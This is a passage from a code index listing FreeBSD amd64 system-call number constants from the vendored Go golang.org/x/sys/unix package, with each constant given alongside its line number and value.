SYS___ACL_SET_FILE (line 207) | SYS___ACL_SET_FILE = 348 constant SYS___ACL_GET_FD (line 208) | SYS___ACL_GET_FD = 349 constant SYS___ACL_SET_FD (line 209) | SYS___ACL_SET_FD = 350 constant SYS___ACL_DELETE_FILE (line 210) | SYS___ACL_DELETE_FILE = 351 constant SYS___ACL_DELETE_FD (line 211) | SYS___ACL_DELETE_FD = 352 constant SYS___ACL_ACLCHECK_FILE (line 212) | SYS___ACL_ACLCHECK_FILE = 353 constant SYS___ACL_ACLCHECK_FD (line 213) | SYS___ACL_ACLCHECK_FD = 354 constant SYS_EXTATTRCTL (line 214) | SYS_EXTATTRCTL = 355 constant SYS_EXTATTR_SET_FILE (line 215) | SYS_EXTATTR_SET_FILE = 356 constant SYS_EXTATTR_GET_FILE (line 216) | SYS_EXTATTR_GET_FILE = 357 constant SYS_EXTATTR_DELETE_FILE (line 217) | SYS_EXTATTR_DELETE_FILE = 358 constant SYS_AIO_WAITCOMPLETE (line 218) | SYS_AIO_WAITCOMPLETE = 359 constant SYS_GETRESUID (line 219) | SYS_GETRESUID = 360 constant SYS_GETRESGID (line 220) | SYS_GETRESGID = 361 constant SYS_KQUEUE (line 221) | SYS_KQUEUE = 362 constant SYS_EXTATTR_SET_FD (line 222) | SYS_EXTATTR_SET_FD = 371 constant SYS_EXTATTR_GET_FD (line 223) | SYS_EXTATTR_GET_FD = 372 constant SYS_EXTATTR_DELETE_FD (line 224) | SYS_EXTATTR_DELETE_FD = 373 constant SYS___SETUGID (line 225) | SYS___SETUGID = 374 constant SYS_EACCESS (line 226) | SYS_EACCESS = 376 constant SYS_NMOUNT (line 227) | SYS_NMOUNT = 378 constant SYS___MAC_GET_PROC (line 228) | SYS___MAC_GET_PROC = 384 constant SYS___MAC_SET_PROC (line 229) | SYS___MAC_SET_PROC = 385 constant SYS___MAC_GET_FD (line 230) | SYS___MAC_GET_FD = 386 constant SYS___MAC_GET_FILE (line 231) | SYS___MAC_GET_FILE = 387 constant SYS___MAC_SET_FD (line 232) | SYS___MAC_SET_FD = 388 constant SYS___MAC_SET_FILE (line 233) | SYS___MAC_SET_FILE = 389 constant SYS_KENV (line 234) | SYS_KENV = 390 constant SYS_LCHFLAGS (line 235) | SYS_LCHFLAGS = 391 constant SYS_UUIDGEN (line 236) | SYS_UUIDGEN = 392 constant SYS_SENDFILE (line 237) | SYS_SENDFILE = 393 constant SYS_MAC_SYSCALL (line 238) | SYS_MAC_SYSCALL = 394 constant SYS_KSEM_CLOSE (line 239) | SYS_KSEM_CLOSE = 400 constant SYS_KSEM_POST (line 240) | SYS_KSEM_POST = 401 constant SYS_KSEM_WAIT (line 241) | SYS_KSEM_WAIT = 402 constant SYS_KSEM_TRYWAIT (line 242) | SYS_KSEM_TRYWAIT = 403 constant SYS_KSEM_INIT (line 243) | SYS_KSEM_INIT = 404 constant SYS_KSEM_OPEN (line 244) | SYS_KSEM_OPEN = 405 constant SYS_KSEM_UNLINK (line 245) | SYS_KSEM_UNLINK = 406 constant SYS_KSEM_GETVALUE (line 246) | SYS_KSEM_GETVALUE = 407 constant SYS_KSEM_DESTROY (line 247) | SYS_KSEM_DESTROY = 408 constant SYS___MAC_GET_PID (line 248) | SYS___MAC_GET_PID = 409 constant SYS___MAC_GET_LINK (line 249) | SYS___MAC_GET_LINK = 410 constant SYS___MAC_SET_LINK (line 250) | SYS___MAC_SET_LINK = 411 constant SYS_EXTATTR_SET_LINK (line 251) | SYS_EXTATTR_SET_LINK = 412 constant SYS_EXTATTR_GET_LINK (line 252) | SYS_EXTATTR_GET_LINK = 413 constant SYS_EXTATTR_DELETE_LINK (line 253) | SYS_EXTATTR_DELETE_LINK = 414 constant SYS___MAC_EXECVE (line 254) | SYS___MAC_EXECVE = 415 constant SYS_SIGACTION (line 255) | SYS_SIGACTION = 416 constant SYS_SIGRETURN (line 256) | SYS_SIGRETURN = 417 constant SYS_GETCONTEXT (line 257) | SYS_GETCONTEXT = 421 constant SYS_SETCONTEXT (line 258) | SYS_SETCONTEXT = 422 constant SYS_SWAPCONTEXT (line 259) | SYS_SWAPCONTEXT = 423 constant SYS_SWAPOFF (line 260) | SYS_SWAPOFF = 424 constant SYS___ACL_GET_LINK (line 261) | SYS___ACL_GET_LINK = 425 constant SYS___ACL_SET_LINK (line 262) | SYS___ACL_SET_LINK = 426 constant SYS___ACL_DELETE_LINK (line 263) | SYS___ACL_DELETE_LINK = 427 constant SYS___ACL_ACLCHECK_LINK (line 264) | SYS___ACL_ACLCHECK_LINK = 428 constant SYS_SIGWAIT (line 265) | SYS_SIGWAIT = 429 constant SYS_THR_CREATE (line 266) | SYS_THR_CREATE = 430 constant SYS_THR_EXIT (line 267) | SYS_THR_EXIT = 431 constant SYS_THR_SELF (line 268) | SYS_THR_SELF = 432 constant SYS_THR_KILL (line 269) | SYS_THR_KILL = 433 constant SYS_JAIL_ATTACH (line 270) | SYS_JAIL_ATTACH = 436 constant SYS_EXTATTR_LIST_FD (line 271) | SYS_EXTATTR_LIST_FD = 437 constant SYS_EXTATTR_LIST_FILE (line 272) | SYS_EXTATTR_LIST_FILE = 438 constant SYS_EXTATTR_LIST_LINK (line 273) | SYS_EXTATTR_LIST_LINK = 439 constant SYS_KSEM_TIMEDWAIT (line 274) | SYS_KSEM_TIMEDWAIT = 441 constant SYS_THR_SUSPEND (line 275) | SYS_THR_SUSPEND = 442 constant SYS_THR_WAKE (line 276) | SYS_THR_WAKE = 443 constant SYS_KLDUNLOADF (line 277) | SYS_KLDUNLOADF = 444 constant SYS_AUDIT (line 278) | SYS_AUDIT = 445 constant SYS_AUDITON (line 279) | SYS_AUDITON = 446 constant SYS_GETAUID (line 280) | SYS_GETAUID = 447 constant SYS_SETAUID (line 281) | SYS_SETAUID = 448 constant SYS_GETAUDIT (line 282) | SYS_GETAUDIT = 449 constant SYS_SETAUDIT (line 283) | SYS_SETAUDIT = 450 constant SYS_GETAUDIT_ADDR (line 284) | SYS_GETAUDIT_ADDR = 451 constant SYS_SETAUDIT_ADDR (line 285) | SYS_SETAUDIT_ADDR = 452 constant SYS_AUDITCTL (line 286) | SYS_AUDITCTL = 453 constant SYS__UMTX_OP (line 287) | SYS__UMTX_OP = 454 constant SYS_THR_NEW (line 288) | SYS_THR_NEW = 455 constant SYS_SIGQUEUE (line 289) | SYS_SIGQUEUE = 456 constant SYS_KMQ_OPEN (line 290) | SYS_KMQ_OPEN = 457 constant SYS_KMQ_SETATTR (line 291) | SYS_KMQ_SETATTR = 458 constant SYS_KMQ_TIMEDRECEIVE (line 292) | SYS_KMQ_TIMEDRECEIVE = 459 constant SYS_KMQ_TIMEDSEND (line 293) | SYS_KMQ_TIMEDSEND = 460 constant SYS_KMQ_NOTIFY (line 294) | SYS_KMQ_NOTIFY = 461 constant SYS_KMQ_UNLINK (line 295) | SYS_KMQ_UNLINK = 462 constant SYS_ABORT2 (line 296) | SYS_ABORT2 = 463 constant SYS_THR_SET_NAME (line 297) | SYS_THR_SET_NAME = 464 constant SYS_AIO_FSYNC (line 298) | SYS_AIO_FSYNC = 465 constant SYS_RTPRIO_THREAD (line 299) | SYS_RTPRIO_THREAD = 466 constant SYS_SCTP_PEELOFF (line 300) | SYS_SCTP_PEELOFF = 471 constant SYS_SCTP_GENERIC_SENDMSG (line 301) | SYS_SCTP_GENERIC_SENDMSG = 472 constant SYS_SCTP_GENERIC_SENDMSG_IOV (line 302) | SYS_SCTP_GENERIC_SENDMSG_IOV = 473 constant SYS_SCTP_GENERIC_RECVMSG (line 303) | SYS_SCTP_GENERIC_RECVMSG = 474 constant SYS_PREAD (line 304) | SYS_PREAD = 475 constant SYS_PWRITE (line 305) | SYS_PWRITE = 476 constant SYS_MMAP (line 306) | SYS_MMAP = 477 constant SYS_LSEEK (line 307) | SYS_LSEEK = 478 constant SYS_TRUNCATE (line 308) | SYS_TRUNCATE = 479 constant SYS_FTRUNCATE (line 309) | SYS_FTRUNCATE = 480 constant SYS_THR_KILL2 (line 310) | SYS_THR_KILL2 = 481 constant SYS_SHM_OPEN (line 311) | SYS_SHM_OPEN = 482 constant SYS_SHM_UNLINK (line 312) | SYS_SHM_UNLINK = 483 constant SYS_CPUSET (line 313) | SYS_CPUSET = 484 constant SYS_CPUSET_SETID (line 314) | SYS_CPUSET_SETID = 485 constant SYS_CPUSET_GETID (line 315) | SYS_CPUSET_GETID = 486 constant SYS_CPUSET_GETAFFINITY (line 316) | SYS_CPUSET_GETAFFINITY = 487 constant SYS_CPUSET_SETAFFINITY (line 317) | SYS_CPUSET_SETAFFINITY = 488 constant SYS_FACCESSAT (line 318) | SYS_FACCESSAT = 489 constant SYS_FCHMODAT (line 319) | SYS_FCHMODAT = 490 constant SYS_FCHOWNAT (line 320) | SYS_FCHOWNAT = 491 constant SYS_FEXECVE (line 321) | SYS_FEXECVE = 492 constant SYS_FUTIMESAT (line 322) | SYS_FUTIMESAT = 494 constant SYS_LINKAT (line 323) | SYS_LINKAT = 495 constant SYS_MKDIRAT (line 324) | SYS_MKDIRAT = 496 constant SYS_MKFIFOAT (line 325) | SYS_MKFIFOAT = 497 constant SYS_OPENAT (line 326) | SYS_OPENAT = 499 constant SYS_READLINKAT (line 327) | SYS_READLINKAT = 500 constant SYS_RENAMEAT (line 328) | SYS_RENAMEAT = 501 constant SYS_SYMLINKAT (line 329) | SYS_SYMLINKAT = 502 constant SYS_UNLINKAT (line 330) | SYS_UNLINKAT = 503 constant SYS_POSIX_OPENPT (line 331) | SYS_POSIX_OPENPT = 504 constant SYS_GSSD_SYSCALL (line 332) | SYS_GSSD_SYSCALL = 505 constant SYS_JAIL_GET (line 333) | SYS_JAIL_GET = 506 constant SYS_JAIL_SET (line 334) | SYS_JAIL_SET = 507 constant SYS_JAIL_REMOVE (line 335) | SYS_JAIL_REMOVE = 508 constant SYS_CLOSEFROM (line 336) | SYS_CLOSEFROM = 509 constant SYS___SEMCTL (line 337) | SYS___SEMCTL = 510 constant SYS_MSGCTL (line 338) | SYS_MSGCTL = 511 constant SYS_SHMCTL (line 339) | SYS_SHMCTL = 512 constant SYS_LPATHCONF (line 340) | SYS_LPATHCONF = 513 constant SYS___CAP_RIGHTS_GET (line 341) | SYS___CAP_RIGHTS_GET = 515 constant SYS_CAP_ENTER (line 342) | SYS_CAP_ENTER = 516 constant SYS_CAP_GETMODE (line 343) | SYS_CAP_GETMODE = 517 constant SYS_PDFORK (line 344) | SYS_PDFORK = 518 constant SYS_PDKILL (line 345) | SYS_PDKILL = 519 constant SYS_PDGETPID (line 346) | SYS_PDGETPID = 520 constant SYS_PSELECT (line 347) | SYS_PSELECT = 522 constant SYS_GETLOGINCLASS (line 348) | SYS_GETLOGINCLASS = 523 constant SYS_SETLOGINCLASS (line 349) | SYS_SETLOGINCLASS = 524 constant SYS_RCTL_GET_RACCT (line 350) | SYS_RCTL_GET_RACCT = 525 constant SYS_RCTL_GET_RULES (line 351) | SYS_RCTL_GET_RULES = 526 constant SYS_RCTL_GET_LIMITS (line 352) | SYS_RCTL_GET_LIMITS = 527 constant SYS_RCTL_ADD_RULE (line 353) | SYS_RCTL_ADD_RULE = 528 constant SYS_RCTL_REMOVE_RULE (line 354) | SYS_RCTL_REMOVE_RULE = 529 constant SYS_POSIX_FALLOCATE (line 355) | SYS_POSIX_FALLOCATE = 530 constant SYS_POSIX_FADVISE (line 356) | SYS_POSIX_FADVISE = 531 constant SYS_WAIT6 (line 357) | SYS_WAIT6 = 532 constant SYS_CAP_RIGHTS_LIMIT (line 358) | SYS_CAP_RIGHTS_LIMIT = 533 constant SYS_CAP_IOCTLS_LIMIT (line 359) | SYS_CAP_IOCTLS_LIMIT = 534 constant SYS_CAP_IOCTLS_GET (line 360) | SYS_CAP_IOCTLS_GET = 535 constant SYS_CAP_FCNTLS_LIMIT (line 361) | SYS_CAP_FCNTLS_LIMIT = 536 constant SYS_CAP_FCNTLS_GET (line 362) | SYS_CAP_FCNTLS_GET = 537 constant SYS_BINDAT (line 363) | SYS_BINDAT = 538 constant SYS_CONNECTAT (line 364) | SYS_CONNECTAT = 539 constant SYS_CHFLAGSAT (line 365) | SYS_CHFLAGSAT = 540 constant SYS_ACCEPT4 (line 366) | SYS_ACCEPT4 = 541 constant SYS_PIPE2 (line 367) | SYS_PIPE2 = 542 constant SYS_AIO_MLOCK (line 368) | SYS_AIO_MLOCK = 543 constant SYS_PROCCTL (line 369) | SYS_PROCCTL = 544 constant SYS_PPOLL (line 370) | SYS_PPOLL = 545 constant SYS_FUTIMENS (line 371) | SYS_FUTIMENS = 546 constant SYS_UTIMENSAT (line 372) | SYS_UTIMENSAT = 547 constant SYS_FDATASYNC (line 373) | SYS_FDATASYNC = 550 constant SYS_FSTAT (line 374) | SYS_FSTAT = 551 constant SYS_FSTATAT (line 375) | SYS_FSTATAT = 552 constant SYS_FHSTAT (line 376) | SYS_FHSTAT = 553 constant SYS_GETDIRENTRIES (line 377) | SYS_GETDIRENTRIES = 554 constant SYS_STATFS (line 378) | SYS_STATFS = 555 constant SYS_FSTATFS (line 379) | SYS_FSTATFS = 556 constant SYS_GETFSSTAT (line 380) | SYS_GETFSSTAT = 557 constant SYS_FHSTATFS (line 381) | SYS_FHSTATFS = 558 constant SYS_MKNODAT (line 382) | SYS_MKNODAT = 559 constant SYS_KEVENT (line 383) | SYS_KEVENT = 560 constant SYS_CPUSET_GETDOMAIN (line 384) | SYS_CPUSET_GETDOMAIN = 561 constant SYS_CPUSET_SETDOMAIN (line 385) | SYS_CPUSET_SETDOMAIN = 562 constant SYS_GETRANDOM (line 386) | SYS_GETRANDOM = 563 constant SYS_GETFHAT (line 387) | SYS_GETFHAT = 564 constant SYS_FHLINK (line 388) | SYS_FHLINK = 565 constant SYS_FHLINKAT (line 389) | SYS_FHLINKAT = 566 constant SYS_FHREADLINK (line 390) | SYS_FHREADLINK = 567 constant SYS___SYSCTLBYNAME (line 391) | SYS___SYSCTLBYNAME = 570 constant SYS_CLOSE_RANGE (line 392) | SYS_CLOSE_RANGE = 575 FILE: vendor/golang.org/x/sys/unix/zsysnum_freebsd_amd64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 16) | SYS_WAIT4 = 7 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_CHDIR (line 19) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 20) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 21) | SYS_CHMOD = 15 constant SYS_CHOWN (line 22) | SYS_CHOWN = 16 constant SYS_BREAK (line 23) | SYS_BREAK = 17 constant SYS_GETPID (line 24) | SYS_GETPID = 20 constant SYS_MOUNT (line 25) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 26) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_GETEGID (line 44) | SYS_GETEGID = 43 constant SYS_PROFIL (line 45) | SYS_PROFIL = 44 constant SYS_KTRACE (line 46) | SYS_KTRACE = 45 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_GETLOGIN (line 48) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 49) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 50) | SYS_ACCT = 51 constant SYS_SIGALTSTACK (line 51) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 52) | SYS_IOCTL = 54 constant SYS_REBOOT (line 53) | SYS_REBOOT = 55 constant SYS_REVOKE (line 54) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 55) | SYS_SYMLINK = 57 constant SYS_READLINK (line 56) | SYS_READLINK = 58 constant SYS_EXECVE (line 57) | SYS_EXECVE = 59 constant SYS_UMASK (line 58) | SYS_UMASK = 60 constant SYS_CHROOT (line 59) | SYS_CHROOT = 61 constant SYS_MSYNC (line 60) | SYS_MSYNC = 65 constant SYS_VFORK (line 61) | SYS_VFORK = 66 constant SYS_SBRK (line 62) | SYS_SBRK = 69 constant SYS_SSTK (line 63) | SYS_SSTK = 70 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 88) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 89) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 90) | SYS_READV = 120 constant SYS_WRITEV (line 91) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 92) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 93) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 94) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 95) | SYS_SETREUID = 126 constant SYS_SETREGID (line 96) | SYS_SETREGID = 127 constant SYS_RENAME (line 97) | SYS_RENAME = 128 constant SYS_FLOCK (line 98) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 99) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 100) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 101) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 102) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 103) | SYS_MKDIR = 136 constant SYS_RMDIR (line 104) | SYS_RMDIR = 137 constant SYS_UTIMES (line 105) | SYS_UTIMES = 138 constant SYS_ADJTIME (line 106) | SYS_ADJTIME = 140 constant SYS_SETSID (line 107) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 108) | SYS_QUOTACTL = 148 constant SYS_NLM_SYSCALL (line 109) | SYS_NLM_SYSCALL = 154 constant SYS_NFSSVC (line 110) | SYS_NFSSVC = 155 constant SYS_LGETFH (line 111) | SYS_LGETFH = 160 constant SYS_GETFH (line 112) | SYS_GETFH = 161 constant SYS_SYSARCH (line 113) | SYS_SYSARCH = 165 constant SYS_RTPRIO (line 114) | SYS_RTPRIO = 166 constant SYS_SEMSYS (line 115) | SYS_SEMSYS = 169 constant SYS_MSGSYS (line 116) | SYS_MSGSYS = 170 constant SYS_SHMSYS (line 117) | SYS_SHMSYS = 171 constant SYS_SETFIB (line 118) | SYS_SETFIB = 175 constant SYS_NTP_ADJTIME (line 119) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 120) | SYS_SETGID = 181 constant SYS_SETEGID (line 121) | SYS_SETEGID = 182 constant SYS_SETEUID (line 122) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 123) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 124) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 125) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 126) | SYS_SETRLIMIT = 195 constant SYS___SYSCTL (line 127) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 128) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 129) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 130) | SYS_UNDELETE = 205 constant SYS_FUTIMES (line 131) | SYS_FUTIMES = 206 constant SYS_GETPGID (line 132) | SYS_GETPGID = 207 constant SYS_POLL (line 133) | SYS_POLL = 209 constant SYS_SEMGET (line 134) | SYS_SEMGET = 221 constant SYS_SEMOP (line 135) | SYS_SEMOP = 222 constant SYS_MSGGET (line 136) | SYS_MSGGET = 225 constant SYS_MSGSND (line 137) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 138) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 139) | SYS_SHMAT = 228 constant SYS_SHMDT (line 140) | SYS_SHMDT = 230 constant SYS_SHMGET (line 141) | SYS_SHMGET = 231 constant SYS_CLOCK_GETTIME (line 142) | SYS_CLOCK_GETTIME = 232 constant SYS_CLOCK_SETTIME (line 143) | SYS_CLOCK_SETTIME = 233 constant SYS_CLOCK_GETRES (line 144) | SYS_CLOCK_GETRES = 234 constant SYS_KTIMER_CREATE (line 145) | SYS_KTIMER_CREATE = 235 constant SYS_KTIMER_DELETE (line 146) | SYS_KTIMER_DELETE = 236 constant SYS_KTIMER_SETTIME (line 147) | SYS_KTIMER_SETTIME = 237 constant SYS_KTIMER_GETTIME (line 148) | SYS_KTIMER_GETTIME = 238 constant SYS_KTIMER_GETOVERRUN (line 149) | SYS_KTIMER_GETOVERRUN = 239 constant SYS_NANOSLEEP (line 150) | SYS_NANOSLEEP = 240 constant SYS_FFCLOCK_GETCOUNTER (line 151) | SYS_FFCLOCK_GETCOUNTER = 241 constant SYS_FFCLOCK_SETESTIMATE (line 152) | SYS_FFCLOCK_SETESTIMATE = 242 constant SYS_FFCLOCK_GETESTIMATE (line 153) | SYS_FFCLOCK_GETESTIMATE = 243 constant SYS_CLOCK_NANOSLEEP (line 154) | SYS_CLOCK_NANOSLEEP = 244 constant SYS_CLOCK_GETCPUCLOCKID2 (line 155) | SYS_CLOCK_GETCPUCLOCKID2 = 247 constant SYS_NTP_GETTIME (line 156) | SYS_NTP_GETTIME = 248 constant SYS_MINHERIT (line 157) | SYS_MINHERIT = 250 constant SYS_RFORK (line 158) | SYS_RFORK = 251 constant SYS_ISSETUGID (line 159) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 160) | SYS_LCHOWN = 254 constant SYS_AIO_READ (line 161) | SYS_AIO_READ = 255 constant SYS_AIO_WRITE (line 162) | SYS_AIO_WRITE = 256 constant SYS_LIO_LISTIO (line 163) | SYS_LIO_LISTIO = 257 constant SYS_LCHMOD (line 164) | SYS_LCHMOD = 274 constant SYS_LUTIMES (line 165) | SYS_LUTIMES = 276 constant SYS_PREADV (line 166) | SYS_PREADV = 289 constant SYS_PWRITEV (line 167) | SYS_PWRITEV = 290 constant SYS_FHOPEN (line 168) | SYS_FHOPEN = 298 constant SYS_MODNEXT (line 169) | SYS_MODNEXT = 300 constant SYS_MODSTAT (line 170) | SYS_MODSTAT = 301 constant SYS_MODFNEXT (line 171) | SYS_MODFNEXT = 302 constant SYS_MODFIND (line 172) | SYS_MODFIND = 303 constant SYS_KLDLOAD (line 173) | SYS_KLDLOAD = 304 constant SYS_KLDUNLOAD (line 174) | SYS_KLDUNLOAD = 305 constant SYS_KLDFIND (line 175) | SYS_KLDFIND = 306 constant SYS_KLDNEXT (line 176) | SYS_KLDNEXT = 307 constant SYS_KLDSTAT (line 177) | SYS_KLDSTAT = 308 constant SYS_KLDFIRSTMOD (line 178) | SYS_KLDFIRSTMOD = 309 constant SYS_GETSID (line 179) | SYS_GETSID = 310 constant SYS_SETRESUID (line 180) | SYS_SETRESUID = 311 constant SYS_SETRESGID (line 181) | SYS_SETRESGID = 312 constant SYS_AIO_RETURN (line 182) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 183) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 184) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 185) | SYS_AIO_ERROR = 317 constant SYS_YIELD (line 186) | SYS_YIELD = 321 constant SYS_MLOCKALL (line 187) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 188) | SYS_MUNLOCKALL = 325 constant SYS___GETCWD (line 189) | SYS___GETCWD = 326 constant SYS_SCHED_SETPARAM (line 190) | SYS_SCHED_SETPARAM = 327 constant SYS_SCHED_GETPARAM (line 191) | SYS_SCHED_GETPARAM = 328 constant SYS_SCHED_SETSCHEDULER (line 192) | SYS_SCHED_SETSCHEDULER = 329 constant SYS_SCHED_GETSCHEDULER (line 193) | SYS_SCHED_GETSCHEDULER = 330 constant SYS_SCHED_YIELD (line 194) | SYS_SCHED_YIELD = 331 constant SYS_SCHED_GET_PRIORITY_MAX (line 195) | SYS_SCHED_GET_PRIORITY_MAX = 332 constant SYS_SCHED_GET_PRIORITY_MIN (line 196) | SYS_SCHED_GET_PRIORITY_MIN = 333 constant SYS_SCHED_RR_GET_INTERVAL (line 197) | SYS_SCHED_RR_GET_INTERVAL = 334 constant SYS_UTRACE (line 198) | SYS_UTRACE = 335 constant SYS_KLDSYM (line 199) | SYS_KLDSYM = 337 constant SYS_JAIL (line 200) | SYS_JAIL = 338 constant SYS_SIGPROCMASK (line 201) | SYS_SIGPROCMASK = 340 constant SYS_SIGSUSPEND (line 202) | SYS_SIGSUSPEND = 341 constant SYS_SIGPENDING (line 203) | SYS_SIGPENDING = 343 constant SYS_SIGTIMEDWAIT (line 204) | SYS_SIGTIMEDWAIT = 345 constant SYS_SIGWAITINFO (line 205) | SYS_SIGWAITINFO = 346 constant SYS___ACL_GET_FILE (line 206) | SYS___ACL_GET_FILE = 347 constant SYS___ACL_SET_FILE (line 207) | SYS___ACL_SET_FILE = 348 constant SYS___ACL_GET_FD (line 208) | SYS___ACL_GET_FD = 349 constant SYS___ACL_SET_FD (line 209) | SYS___ACL_SET_FD = 350 constant SYS___ACL_DELETE_FILE (line 210) | SYS___ACL_DELETE_FILE = 351 constant SYS___ACL_DELETE_FD (line 211) | SYS___ACL_DELETE_FD = 352 constant SYS___ACL_ACLCHECK_FILE (line 212) | SYS___ACL_ACLCHECK_FILE = 353 constant SYS___ACL_ACLCHECK_FD (line 213) | SYS___ACL_ACLCHECK_FD = 354 constant SYS_EXTATTRCTL (line 214) | SYS_EXTATTRCTL = 355 constant SYS_EXTATTR_SET_FILE (line 215) | SYS_EXTATTR_SET_FILE = 356 constant SYS_EXTATTR_GET_FILE (line 216) | SYS_EXTATTR_GET_FILE = 357 constant SYS_EXTATTR_DELETE_FILE (line 217) | SYS_EXTATTR_DELETE_FILE = 358 constant SYS_AIO_WAITCOMPLETE (line 218) | SYS_AIO_WAITCOMPLETE = 359 constant SYS_GETRESUID (line 219) | SYS_GETRESUID = 360 constant SYS_GETRESGID (line 220) | SYS_GETRESGID = 361 constant SYS_KQUEUE (line 221) | SYS_KQUEUE = 362 constant SYS_EXTATTR_SET_FD (line 222) | SYS_EXTATTR_SET_FD = 371 constant SYS_EXTATTR_GET_FD (line 223) | SYS_EXTATTR_GET_FD = 372 constant SYS_EXTATTR_DELETE_FD (line 224) | SYS_EXTATTR_DELETE_FD = 373 constant SYS___SETUGID (line 225) | SYS___SETUGID = 374 constant SYS_EACCESS (line 226) | SYS_EACCESS = 376 constant SYS_NMOUNT (line 227) | SYS_NMOUNT = 378 constant SYS___MAC_GET_PROC (line 228) | SYS___MAC_GET_PROC = 384 constant SYS___MAC_SET_PROC (line 229) | SYS___MAC_SET_PROC = 385 constant SYS___MAC_GET_FD (line 230) | SYS___MAC_GET_FD = 386 constant SYS___MAC_GET_FILE (line 231) | SYS___MAC_GET_FILE = 387 constant SYS___MAC_SET_FD (line 232) | SYS___MAC_SET_FD = 388 constant SYS___MAC_SET_FILE (line 233) | SYS___MAC_SET_FILE = 389 constant SYS_KENV (line 234) | SYS_KENV = 390 constant SYS_LCHFLAGS (line 235) | SYS_LCHFLAGS = 391 constant SYS_UUIDGEN (line 236) | SYS_UUIDGEN = 392 constant SYS_SENDFILE (line 237) | SYS_SENDFILE = 393 constant SYS_MAC_SYSCALL (line 238) | SYS_MAC_SYSCALL = 394 constant SYS_KSEM_CLOSE (line 239) | SYS_KSEM_CLOSE = 